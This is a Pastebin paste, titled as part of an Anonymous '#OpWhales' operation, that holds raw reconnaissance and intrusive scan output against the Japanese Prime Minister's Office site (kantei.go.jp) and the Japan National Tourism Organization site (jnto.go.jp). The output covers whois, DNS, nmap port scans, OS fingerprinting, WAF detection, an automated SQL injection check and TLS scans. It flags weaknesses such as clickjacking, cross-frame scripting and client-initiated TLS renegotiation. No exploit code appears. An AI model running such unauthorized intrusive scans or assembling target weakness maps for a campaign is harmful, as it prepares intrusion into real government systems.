API tools faq
paste
Advertisement
Guest User

Anonymous V.S BlackHat #OpWhales JTSEC full Recon #2

a guest
Jan 8th, 2018
900
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 55.29 KB | None | 0 0
raw download clone embed print report
  1. #######################################################################################################################################
  2. Hostname www.kantei.go.jp ISP Unknown
  3. Continent Unknown Flag
  4. JP
  5. Country Japan Country Code JP
  6. Region Unknown Local time 08 Jan 2018 23:59 JST
  7. City Unknown Latitude 36
  8. IP Address (IPv6) 2001:240:1e00:1021::10 Longitude 138
  9. #######################################################################################################################################
  10. [i] Scanning Site: http://kantei.go.jp
  11.  
  12.  
  13.  
  14. B A S I C I N F O
  15. ====================
  16.  
  17.  
  18. [+] Site Title: 首相官邸ホームページ
  19. [+] IP address: 202.214.194.138
  20. [+] Web Server: Could Not Detect
  21. [+] CMS: Could Not Detect
  22. [+] Cloudflare: Not Detected
  23. [+] Robots File: Could NOT Find robots.txt!
  24.  
  25.  
  26.  
  27.  
  28. W H O I S L O O K U P
  29. ========================
  30.  
  31. [ JPRS database provides information on network administration. Its use is ]
  32. [ restricted to network administration purposes. For further information, ]
  33. [ use 'whois -h whois.jprs.jp help'. To suppress Japanese output, add'/e' ]
  34. [ at the end of command, e.g. 'whois -h whois.jprs.jp xxx/e'. ]
  35.  
  36. Domain Information:
  37. a. [Domain Name] KANTEI.GO.JP
  38. g. [Organization] The Prime Minister's Official Residence
  39. l. [Organization Type] Government
  40. m. [Administrative Contact] MK072JP
  41. n. [Technical Contact] KW15930JP
  42. p. [Name Server] ns7.kantei.go.jp
  43. p. [Name Server] ns8.kantei.go.jp
  44. s. [Signing Key]
  45. [State] Connected (2018/06/30)
  46. [Registered Date] 1994/06/24
  47. [Connected Date] 1994/06/27
  48. [Last Update] 2017/09/22 14:02:03 (JST)
  49.  
  50.  
  51.  
  52.  
  53.  
  54. G E O I P L O O K U P
  55. =========================
  56.  
  57. [i] IP Address: 202.214.216.10
  58. [i] Country: JP
  59. [i] State: Hyogo
  60. [i] City: Kobe
  61. [i] Latitude: 34.691299
  62. [i] Longitude: 135.182999
  63.  
  64.  
  65.  
  66.  
  67. H T T P H E A D E R S
  68. =======================
  69.  
  70.  
  71. [i] HTTP/1.1 302 Found
  72. [i] Date: Mon, 08 Jan 2018 15:03:34 GMT
  73. [i] X-Frame-Options: SAMEORIGIN
  74. [i] Location: http://www.kantei.go.jp/
  75. [i] Content-Length: 208
  76. [i] Connection: close
  77. [i] Content-Type: text/html; charset=iso-8859-1
  78. [i] HTTP/1.1 200 OK
  79. [i] Date: Mon, 08 Jan 2018 15:03:35 GMT
  80. [i] X-Frame-Options: SAMEORIGIN
  81. [i] Last-Modified: Fri, 05 Jan 2018 11:56:43 GMT
  82. [i] ETag: "6eda-562062461913e"
  83. [i] Accept-Ranges: bytes
  84. [i] Content-Length: 29175
  85. [i] Cache-Control: no-cache
  86. [i] Expires: Mon, 08 Jan 2018 15:03:35 GMT
  87. [i] Pragma: no-cache
  88. [i] Connection: close
  89. [i] Content-Type: text/html
  90.  
  91.  
  92.  
  93.  
  94. D N S L O O K U P
  95. ===================
  96.  
  97. kantei.go.jp. 3599 IN SOA ns7.kantei.go.jp. kantei-postmaster.iij-pj.jp. 2017121304 3600 1200 604800 3600
  98. kantei.go.jp. 299 IN NS ns7.kantei.go.jp.
  99. kantei.go.jp. 299 IN NS ns8.kantei.go.jp.
  100. kantei.go.jp. 29 IN A 202.214.194.138
  101. kantei.go.jp. 299 IN MX 10 mx.securemx.jp.
  102. kantei.go.jp. 299 IN MX 60 mx6.securemx.jp.
  103. kantei.go.jp. 299 IN TXT "v=spf1 include:spf.securemx.jp +ip4:202.214.194.178 +ip4:202.214.216.50 +ip6:2001:0240:1e00:0f21::178 +ip6:2001:0240:1e00:1021::50 -all"
  104. kantei.go.jp. 29 IN AAAA 2001:240:1e00:f21::138
  105.  
  106.  
  107.  
  108.  
  109. S U B N E T C A L C U L A T I O N
  110. ====================================
  111.  
  112. Address = 2001:240:1e00:f21::138
  113. Network = 2001:240:1e00:f21::138 / 128
  114. Netmask = ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
  115. Wildcard Mask = ::
  116. Hosts Bits = 0
  117. Max. Hosts = 0 (2^0 - 1)
  118. Host Range = { 2001:240:1e00:f21::139 - 2001:240:1e00:f21::138 }
  119.  
  120.  
  121.  
  122. N M A P P O R T S C A N
  123. ============================
  124.  
  125.  
  126. Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-08 15:03 UTC
  127. Nmap scan report for kantei.go.jp (202.214.216.10)
  128. Host is up (0.18s latency).
  129. Other addresses for kantei.go.jp (not scanned): 2001:240:1e00:f21::138
  130. PORT STATE SERVICE VERSION
  131. 21/tcp filtered ftp
  132. 22/tcp filtered ssh
  133. 23/tcp filtered telnet
  134. 25/tcp filtered smtp
  135. 80/tcp open http?
  136. 110/tcp filtered pop3
  137. 143/tcp filtered imap
  138. 443/tcp open ssl/https?
  139. 445/tcp filtered microsoft-ds
  140. 3389/tcp filtered ms-wbt-server
  141. 2 services unrecognized despite returning data. If you know the service/version, please submit
  142. [!] IP Address : 202.214.216.10
  143. [!] www.kantei.go.jp doesn't seem to use a CMS
  144. [+] Honeypot Probabilty: 0%
  145. ----------------------------------------
  146. PORT STATE SERVICE VERSION
  147. 21/tcp filtered ftp
  148. 22/tcp filtered ssh
  149. 23/tcp filtered telnet
  150. 25/tcp filtered smtp
  151. 80/tcp open http?
  152. 110/tcp filtered pop3
  153. 143/tcp filtered imap
  154. 443/tcp open ssl/https?
  155. 445/tcp filtered microsoft-ds
  156. 3389/tcp filtered ms-wbt-server
  157.  
  158.  
  159. [+] DNS Records
  160.  
  161. [+] Host Records (A)
  162. www.kantei.go.jp (202.214.194.138) AS2497 Internet Initiative Inc. Japan
  163.  
  164. [+] TXT Records
  165.  
  166. [+] DNS Map: https://dnsdumpster.com/static/map/kantei.go.jp.png
  167.  
  168. [>] Initiating 3 intel modules
  169. [>] Loading Alpha module (1/3)
  170. [>] Beta module deployed (2/3)
  171. [>] Gamma module initiated (3/3)
  172. No emails found
  173. No hosts found
  174. [+] Virtual hosts:
  175. -----------------
  176. [>] Crawling the target for fuzzable URLs
  177. [+] Found 1 fuzzable URLs
  178. http://www.kantei.go.jp////nettv.gov-online.go.jp/channel.php?c=01
  179. [>] Using SQLMap api to check for SQL injection vulnerabilities. Don't
  180. worry we are using an online service and it doesn't depend on your internet connection.
  181. This scan will take 2-3 minutes.
  182. [-] None of parameters is vulnerable to SQL injection
  183. [+] These are the URLs having parameters:
  184. http://www.kantei.go.jp////nettv.gov-online.go.jp/channel.php?c=01
  185. ====================================================================================
  186. RUNNING NSLOOKUP
  187. ====================================================================================
  188. ** server can't find 138.194.214.202.in-addr.arpa: NXDOMAIN
  189.  
  190. Host 138.194.214.202.in-addr.arpa. not found: 3(NXDOMAIN)
  191. ====================================================================================
  192. CHECKING OS FINGERPRINT
  193. ====================================================================================
  194.  
  195. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  196.  
  197. [+] Target is 202.214.194.138
  198. [+] Loading modules.
  199. [+] Following modules are loaded:
  200. [x] [1] ping:icmp_ping - ICMP echo discovery module
  201. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  202. [x] [3] ping:udp_ping - UDP-based ping discovery module
  203. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  204. [x] [5] infogather:portscan - TCP and UDP PortScanner
  205. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  206. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  207. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  208. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  209. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  210. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  211. [x] [12] fingerprint:smb - SMB fingerprinting module
  212. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  213. [+] 13 modules registered
  214. [+] Initializing scan engine
  215. [+] Running scan engine
  216. [-] ping:tcp_ping module: no closed/open TCP ports known on 202.214.194.138. Module test failed
  217. [-] ping:udp_ping module: no closed/open UDP ports known on 202.214.194.138. Module test failed
  218. [-] No distance calculation. 202.214.194.138 appears to be dead or no ports known
  219. [+] Host: 202.214.194.138 is down (Guess probability: 0%)
  220. [+] Cleaning up scan engine
  221. [+] Modules deinitialized
  222. [+] Execution completed.
  223.  
  224. ====================================================================================
  225. PINGING HOST
  226. ====================================================================================
  227. PING 202.214.194.138 (202.214.194.138) 56(84) bytes of data.
  228.  
  229. --- 202.214.194.138 ping statistics ---
  230. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
  231.  
  232.  
  233. ====================================================================================
  234. RUNNING TCP PORT SCAN
  235. ====================================================================================
  236.  
  237. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 10:22 EST
  238. Nmap scan report for 202.214.194.138
  239. Host is up (0.40s latency).
  240. Not shown: 471 filtered ports
  241. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  242. PORT STATE SERVICE
  243. 80/tcp open http
  244. 443/tcp open https
  245.  
  246. Nmap done: 1 IP address (1 host up) scanned in 164.02 seconds
  247.  
  248. ====================================================================================
  249. RUNNING INTRUSIVE SCANS
  250. ====================================================================================
  251. + -- --=[Port 21 closed... skipping.
  252. + -- --=[Port 22 closed... skipping.
  253. + -- --=[Port 23 closed... skipping.
  254. + -- --=[Port 25 closed... skipping.
  255. + -- --=[Port 53 closed... skipping.
  256. + -- --=[Port 79 closed... skipping.
  257. + -- --=[Port 80 opened... running tests...
  258. ====================================================================================
  259. CHECKING FOR WAF
  260. ====================================================================================
  261.  
  262. ^ ^
  263. _ __ _ ____ _ __ _ _ ____
  264. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  265. | V V // o // _/ | V V // 0 // 0 // _/
  266. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  267. <
  268. ...'
  269.  
  270. WAFW00F - Web Application Firewall Detection Tool
  271.  
  272. By Sandro Gauci && Wendel G. Henrique
  273.  
  274. Checking http://202.214.194.138
  275. Generic Detection results:
  276. The site http://202.214.194.138 seems to be behind a WAF or some sort of security solution
  277. Reason: Blocking is being done at connection/packet level.
  278. Number of requests: 9
  279.  
  280. ====================================================================================
  281. GATHERING HTTP INFO
  282. ====================================================================================
  283. http://202.214.194.138 [200 OK] Cookies[RAFP_UID,TS01791bf6], Country[JAPAN][JP], IP[202.214.194.138], JQuery[1.8.3], Script[text/javascript], Title[首相官邸ホームページ], X-Frame-Options[SAMEORIGIN]
  284.  
  285. __ ______ _____
  286. \ \/ / ___|_ _|
  287. \ /\___ \ | |
  288. / \ ___) || |
  289. /_/\_|____/ |_|
  290.  
  291. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  292. + -- --=[Target: 202.214.194.138:80
  293. + -- --=[Site not vulnerable to Cross-Site Tracing!
  294. + -- --=[Site not vulnerable to Host Header Injection!
  295. + -- --=[Site vulnerable to Cross-Frame Scripting!
  296. + -- --=[Site vulnerable to Clickjacking!
  297.  
  298. HTTP/1.1 200 OK
  299. Cache-Control: no-cache
  300. Connection: close
  301. Content-Type: text/html; charset=utf-8
  302. Pragma: no-cache
  303. Content-Length: 80
  304.  
  305. <html><head><title>Request Error</title></head><body>Request Error</body></html>
  306.  
  307.  
  308.  
  309.  
  310. ====================================================================================
  311. CHECKING HTTP HEADERS
  312. ====================================================================================
  313. + -- --=[Checking if X-Content options are enabled on 202.214.194.138...
  314.  
  315. + -- --=[Checking if X-Frame options are enabled on 202.214.194.138...
  316. X-Frame-Options: SAMEORIGIN
  317.  
  318. + -- --=[Checking if X-XSS-Protection header is enabled on 202.214.194.138...
  319.  
  320. + -- --=[Checking HTTP methods on 202.214.194.138...
  321. HTTP/1.1 405 Method Not Allowed
  322. Allow:
  323.  
  324. + -- --=[Checking if TRACE method is enabled on 202.214.194.138...
  325.  
  326. + -- --=[Checking for META tags on 202.214.194.138...
  327. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  328. <meta http-equiv="Content-Style-Type" content="text/css" />
  329. <meta http-equiv="Content-Script-Type" content="text/javascript" />
  330. <meta name="description" content="首相官邸のホームページです。内閣や総理大臣に関する情報をご覧になれます。" />
  331. <meta name="keywords" content="首相官邸,政府,内閣,総理,内閣官房" />
  332. <meta name="viewport" content="width=device-width, user-scalable=yes, initial-scale=1.0,target-densitydpi=device-dpi" />
  333. <meta name="format-detection" content="telephone=no" />
  334.  
  335. + -- --=[Checking for open proxy on 202.214.194.138...
  336. /* WITH FIRST PARTY COOKIE */
  337. (function() {
  338. var bi = document.createElement('script');bi.type = 'text/javascript'; bi.async = true;
  339. bi.src = '//cs.nakanohito.jp/b3/bi.js';
  340. var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(bi, s);
  341. })();
  342. </script>
  343. <!-- User Insight PCDF Code End : kantei.go.jp -->
  344. </body>
  345. </html>
  346. + -- --=[Enumerating software on 202.214.194.138...
  347.  
  348. + -- --=[Checking if Strict-Transport-Security is enabled on 202.214.194.138...
  349.  
  350. + -- --=[Checking for Flash cross-domain policy on 202.214.194.138...
  351. Please try again from the top page. Thank you for your understanding. <br />
  352. <br />
  353. &nbsp;&nbsp;<img src="/error/contents_rmark.gif" alt="" width="7" height="6" border="0"> <a href="/foreign/index-e.html">Prime Minister of Japan and His Cabinet Top Page (PC site only)</a>
  354. <br />
  355. </td>
  356. </tr>
  357. </table>
  358. <!-- /�R���e���c-->
  359. </BODY>
  360. </HTML>
  361.  
  362. + -- --=[Checking for Silverlight cross-domain policy on 202.214.194.138...
  363. Please try again from the top page. Thank you for your understanding. <br />
  364. <br />
  365. &nbsp;&nbsp;<img src="/error/contents_rmark.gif" alt="" width="7" height="6" border="0"> <a href="/foreign/index-e.html">Prime Minister of Japan and His Cabinet Top Page (PC site only)</a>
  366. <br />
  367. </td>
  368. </tr>
  369. </table>
  370. <!-- /�R���e���c-->
  371. </BODY>
  372. </HTML>
  373.  
  374. + -- --=[Checking for HTML5 cross-origin resource sharing on 202.214.194.138...
  375.  
  376. + -- --=[Retrieving robots.txt on 202.214.194.138...
  377. Please try again from the top page. Thank you for your understanding. <br />
  378. <br />
  379. &nbsp;&nbsp;<img src="/error/contents_rmark.gif" alt="" width="7" height="6" border="0"> <a href="/foreign/index-e.html">Prime Minister of Japan and His Cabinet Top Page (PC site only)</a>
  380. <br />
  381. </td>
  382. </tr>
  383. </table>
  384. <!-- /�R���e���c-->
  385. </BODY>
  386. </HTML>
  387.  
  388. + -- --=[Retrieving sitemap.xml on 202.214.194.138...
  389. Please try again from the top page. Thank you for your understanding. <br />
  390. <br />
  391. &nbsp;&nbsp;<img src="/error/contents_rmark.gif" alt="" width="7" height="6" border="0"> <a href="/foreign/index-e.html">Prime Minister of Japan and His Cabinet Top Page (PC site only)</a>
  392. <br />
  393. </td>
  394. </tr>
  395. </table>
  396. <!-- /�R���e���c-->
  397. </BODY>
  398. </HTML>
  399.  
  400. + -- --=[Checking cookie attributes on 202.214.194.138...
  401.  
  402. + -- --=[Checking for ASP.NET Detailed Errors on 202.214.194.138...
  403. <td><img src="/error/line_b.gif" alt="" width="100%" height="8"></td></tr>
  404. &nbsp;&nbsp;<img src="/error/contents_rmark.gif" alt="" width="7" height="6" border="0"> <a href="/foreign/index-e.html">Prime Minister of Japan and His Cabinet Top Page (PC site only)</a>
  405. Fichier binaire (entrée standard) correspondant
  406. <td><img src="/error/line_b.gif" alt="" width="100%" height="8"></td></tr>
  407. &nbsp;&nbsp;<img src="/error/contents_rmark.gif" alt="" width="7" height="6" border="0"> <a href="/foreign/index-e.html">Prime Minister of Japan and His Cabinet Top Page (PC site only)</a>
  408. Fichier binaire (entrée standard) correspondant
  409.  
  410.  
  411. ====================================================================================
  412. SAVING SCREENSHOTS
  413. ====================================================================================
  414. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/202.214.194.138-port80.jpg
  415. libpng warning: iCCP: known incorrect sRGB profile
  416. libpng warning: iCCP: known incorrect sRGB profile
  417. + -- --=[Port 110 closed... skipping.
  418. + -- --=[Port 111 closed... skipping.
  419. + -- --=[Port 135 closed... skipping.
  420. + -- --=[Port 139 closed... skipping.
  421. + -- --=[Port 161 closed... skipping.
  422. + -- --=[Port 162 closed... skipping.
  423. + -- --=[Port 389 closed... skipping.
  424. + -- --=[Port 443 opened... running tests...
  425. ====================================================================================
  426. CHECKING FOR WAF
  427. ====================================================================================
  428.  
  429. ^ ^
  430. _ __ _ ____ _ __ _ _ ____
  431. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  432. | V V // o // _/ | V V // 0 // 0 // _/
  433. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  434. <
  435. ...'
  436.  
  437. WAFW00F - Web Application Firewall Detection Tool
  438.  
  439. By Sandro Gauci && Wendel G. Henrique
  440.  
  441. Checking https://202.214.194.138
  442. ERROR:root:Site https://202.214.194.138 appears to be down
  443.  
  444. ====================================================================================
  445. GATHERING HTTP INFO
  446. ====================================================================================
  447. https://202.214.194.138 [200 OK] Cookies[RAFP_UID,TS01791bf6], Country[JAPAN][JP], IP[202.214.194.138], JQuery[1.8.3], Script[text/javascript], Title[首相官邸ホームページ], X-Frame-Options[SAMEORIGIN]
  448.  
  449. ====================================================================================
  450. GATHERING SSL/TLS INFO
  451. ====================================================================================
  452.  
  453.  
  454.  
  455. AVAILABLE PLUGINS
  456. -----------------
  457.  
  458. PluginHSTS
  459. PluginOpenSSLCipherSuites
  460. PluginCertInfo
  461. PluginSessionRenegotiation
  462. PluginCompression
  463. PluginChromeSha1Deprecation
  464. PluginSessionResumption
  465. PluginHeartbleed
  466.  
  467.  
  468.  
  469. CHECKING HOST(S) AVAILABILITY
  470. -----------------------------
  471.  
  472. 202.214.194.138:443 => 202.214.194.138:443
  473.  
  474.  
  475.  
  476. SCAN RESULTS FOR 202.214.194.138:443 - 202.214.194.138:443
  477. ----------------------------------------------------------
  478.  
  479. * Deflate Compression:
  480. OK - Compression disabled
  481.  
  482. * Session Renegotiation:
  483. Client-initiated Renegotiations: VULNERABLE - Server honors client-initiated renegotiations
  484. Secure Renegotiation: OK - Supported
  485.  
  486. * Certificate - Content:
  487. SHA1 Fingerprint: 41ec0365b4607d31f4f7776ada93bd2f2002ed43
  488. Common Name: *.kantei.go.jp
  489. Issuer: GlobalSign Organization Validation CA - SHA256 - G2
  490. Serial Number: 4664B1F3CCB0E3E36A0606E6
  491. Not Before: Aug 30 06:47:00 2017 GMT
  492. Not After: Aug 31 06:47:00 2019 GMT
  493. Signature Algorithm: sha256WithRSAEncryption
  494. Public Key Algorithm: rsaEncryption
  495. Key Size: 2048 bit
  496. Exponent: 65537 (0x10001)
  497. X509v3 Subject Alternative Name: {'DNS': ['*.kantei.go.jp', 'kantei.go.jp']}
  498.  
  499. * Certificate - Trust:
  500. Hostname Validation: FAILED - Certificate does NOT match 202.214.194.138
  501. Google CA Store (09/2015): OK - Certificate is trusted
  502. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: certificate has expired
  503. Microsoft CA Store (09/2015): OK - Certificate is trusted
  504. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  505. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  506. Certificate Chain Received: ['*.kantei.go.jp', 'GlobalSign Organization Validation CA - SHA256 - G2']
  507.  
  508. * Certificate - OCSP Stapling:
  509. NOT SUPPORTED - Server did not send back an OCSP response.
  510.  
  511. * SSLV2 Cipher Suites:
  512. Server rejected all cipher suites.
  513.  
  514. * Session Resumption:
  515. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  516. With TLS Session Tickets: NOT SUPPORTED - TLS ticket not assigned.
  517.  
  518. * SSLV3 Cipher Suites:
  519. Server rejected all cipher suites.
  520.  
  521.  
  522.  
  523. SCAN COMPLETED IN 10.18 S
  524. -------------------------
  525. Version: 1.11.10-static
  526. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  527.  
  528. Testing SSL server 202.214.194.138 on port 443 using SNI name 202.214.194.138
  529.  
  530. TLS Fallback SCSV:
  531. Server supports TLS Fallback SCSV
  532.  
  533. TLS renegotiation:
  534. Secure session renegotiation supported
  535.  
  536. TLS Compression:
  537. Compression disabled
  538.  
  539. Heartbleed:
  540. TLS 1.2 not vulnerable to heartbleed
  541. TLS 1.1 not vulnerable to heartbleed
  542. TLS 1.0 not vulnerable to heartbleed
  543.  
  544. Supported Server Cipher(s):
  545. Preferred TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
  546. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
  547. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
  548. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  549. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 1024 bits
  550. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  551. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  552. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  553. Accepted TLSv1.2 256 bits AES256-SHA256
  554. Accepted TLSv1.2 256 bits AES256-SHA
  555. Accepted TLSv1.2 128 bits AES128-SHA256
  556. Accepted TLSv1.2 128 bits AES128-SHA
  557. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  558. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  559. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  560. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  561. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  562. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  563. Preferred TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  564. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  565. Accepted TLSv1.1 256 bits AES256-SHA
  566. Accepted TLSv1.1 128 bits AES128-SHA
  567. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  568. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  569. Preferred TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  570. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  571. Accepted TLSv1.0 256 bits AES256-SHA
  572. Accepted TLSv1.0 128 bits AES128-SHA
  573. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  574. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  575.  
  576. SSL Certificate:
  577. Signature Algorithm: sha256WithRSAEncryption
  578. RSA Key Strength: 2048
  579.  
  580. Subject: *.kantei.go.jp
  581. Altnames: DNS:*.kantei.go.jp, DNS:kantei.go.jp
  582. Issuer: GlobalSign Organization Validation CA - SHA256 - G2
  583.  
  584. Not valid before: Aug 30 06:47:00 2017 GMT
  585. Not valid after: Aug 31 06:47:00 2019 GMT
  586. #######################################################################################################################################
  587. Hostname www.jnto.go.jp ISP J-Stream Inc. (AS24253)
  588. Continent Asia Flag
  589. JP
  590. Country Japan Country Code JP (JPN)
  591. Region 19 Local time 09 Jan 2018 00:39 JST
  592. Metropolis Unknown Postal Code 210-0835
  593. City Kawasaki Latitude 35.521
  594. IP Address 202.79.244.228 Longitude 139.717
  595. #######################################################################################################################################
  596. [i] Scanning Site: http://202.79.244.228 #
  597.  
  598.  
  599.  
  600. B A S I C I N F O
  601. ====================
  602.  
  603.  
  604. [+] Site Title: Japan National Tourism Organization Web Site
  605. [+] IP address: 202.79.244.228
  606. [+] Web Server: Apache
  607. [+] CMS: Could Not Detect
  608. [+] Cloudflare: Not Detected
  609. [+] Robots File: Found
  610.  
  611. -------------[ contents ]----------------
  612. User-agent: bingbot
  613. Crawl-Delay: 5
  614.  
  615. User-agent: AhrefsBot
  616. Disallow: /
  617.  
  618. User-agent: BLEXBot
  619. Disallow: /
  620. -----------[end of contents]-------------
  621.  
  622.  
  623.  
  624. W H O I S L O O K U P
  625. ========================
  626.  
  627. % [whois.apnic.net]
  628. % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
  629.  
  630. % Information related to '202.79.240.0 - 202.79.247.255'
  631.  
  632. % Abuse contact for '202.79.240.0 - 202.79.247.255' is 'hostmaster@nic.ad.jp'
  633.  
  634. inetnum: 202.79.240.0 - 202.79.247.255
  635. netname: J-Stream
  636. descr: J-Stream Inc.
  637. descr: Shiba 256 Square Bldg. 6F, 2-5-6 Shiba,
  638. descr: Minato-ku, Tokyo, 105-0014 JAPAN
  639. country: JP
  640. admin-c: JNIC1-AP
  641. tech-c: JNIC1-AP
  642. status: ALLOCATED PORTABLE
  643. remarks: Email address for spam or abuse complaints : abuse@stream.co.jp
  644. mnt-by: MAINT-JPNIC
  645. mnt-irt: IRT-JPNIC-JP
  646. mnt-lower: MAINT-JPNIC
  647. last-modified: 2015-12-01T22:30:08Z
  648. source: APNIC
  649.  
  650. irt: IRT-JPNIC-JP
  651. address: Urbannet-Kanda Bldg 4F, 3-6-2 Uchi-Kanda
  652. address: Chiyoda-ku, Tokyo 101-0047, Japan
  653. e-mail: hostmaster@nic.ad.jp
  654. abuse-mailbox: hostmaster@nic.ad.jp
  655. admin-c: JNIC1-AP
  656. tech-c: JNIC1-AP
  657. auth: # Filtered
  658. mnt-by: MAINT-JPNIC
  659. last-modified: 2017-10-18T10:21:54Z
  660. source: APNIC
  661.  
  662. role: Japan Network Information Center
  663. address: Urbannet-Kanda Bldg 4F
  664. address: 3-6-2 Uchi-Kanda
  665. address: Chiyoda-ku, Tokyo 101-0047,Japan
  666. country: JP
  667. phone: +81-3-5297-2311
  668. fax-no: +81-3-5297-2312
  669. e-mail: hostmaster@nic.ad.jp
  670. admin-c: JI13-AP
  671. tech-c: JE53-AP
  672. nic-hdl: JNIC1-AP
  673. mnt-by: MAINT-JPNIC
  674. last-modified: 2012-08-28T07:58:02Z
  675. source: APNIC
  676.  
  677. % Information related to '202.79.240.0 - 202.79.247.255'
  678.  
  679. inetnum: 202.79.240.0 - 202.79.247.255
  680. netname: J-Stream-CIDR-BLK-JP
  681. descr: J-Stream Inc.
  682. remarks: Email address for spam or abuse complaints : abuse@stream.co.jp
  683. country: JP
  684. admin-c: SM3560JP
  685. tech-c: SM3560JP
  686. remarks: This information has been partially mirrored by APNIC from
  687. remarks: JPNIC. To obtain more specific information, please use the
  688. remarks: JPNIC WHOIS Gateway at
  689. remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or
  690. remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
  691. remarks: defaults to Japanese output, use the /e switch for English
  692. remarks: output)
  693. changed: apnic-ftp@nic.ad.jp 20050124
  694. changed: apnic-ftp@nic.ad.jp 20101019
  695. source: JPNIC
  696.  
  697. % This query was served by the APNIC Whois Service version 1.88.15-43 (WHOIS-US3)
  698.  
  699.  
  700.  
  701.  
  702.  
  703.  
  704. G E O I P L O O K U P
  705. =========================
  706.  
  707. [i] IP Address: 202.79.244.228
  708. [i] Country: JP
  709. [i] State: Tokyo
  710. [i] City: Tokyo
  711. [i] Latitude: 35.685001
  712. [i] Longitude: 139.751404
  713.  
  714.  
  715.  
  716.  
  717. H T T P H E A D E R S
  718. =======================
  719.  
  720.  
  721. [i] HTTP/1.1 200 OK
  722. [i] Date: Mon, 08 Jan 2018 15:42:47 GMT
  723. [i] Server: Apache
  724. [i] Last-Modified: Tue, 06 Jun 2017 07:28:20 GMT
  725. [i] ETag: "1e2e-55145905a8d00"
  726. [i] Accept-Ranges: bytes
  727. [i] Content-Length: 7726
  728. [i] Connection: close
  729. [i] Content-Type: text/html
  730.  
  731.  
  732.  
  733.  
  734. D N S L O O K U P
  735. ===================
  736.  
  737. no records found
  738.  
  739.  
  740.  
  741. S U B N E T C A L C U L A T I O N
  742. ====================================
  743.  
  744. Address = 202.79.244.228
  745. Network = 202.79.244.228 / 32
  746. Netmask = 255.255.255.255
  747. Broadcast = not needed on Point-to-Point links
  748. Wildcard Mask = 0.0.0.0
  749. Hosts Bits = 0
  750. Max. Hosts = 1 (2^0 - 0)
  751. Host Range = { 202.79.244.228 - 202.79.244.228 }
  752.  
  753.  
  754.  
  755. N M A P P O R T S C A N
  756. ============================
  757.  
  758.  
  759. Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-08 15:42 UTC
  760. Nmap scan report for bbt244-jnto-web01-228.jnto.go.jp (202.79.244.228)
  761. Host is up (0.16s latency).
  762. PORT STATE SERVICE VERSION
  763. 21/tcp filtered ftp
  764. 22/tcp filtered ssh
  765. 23/tcp filtered telnet
  766. 25/tcp filtered smtp
  767. 80/tcp open http Apache httpd
  768. 110/tcp filtered pop3
  769. 143/tcp filtered imap
  770. 443/tcp open ssl/http Apache httpd
  771. 445/tcp filtered microsoft-ds
  772. 3389/tcp filtered ms-wbt-server
  773.  
  774. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  775. Nmap done: 1 IP address (1 host up) scanned in 16.45 seconds
  776.  
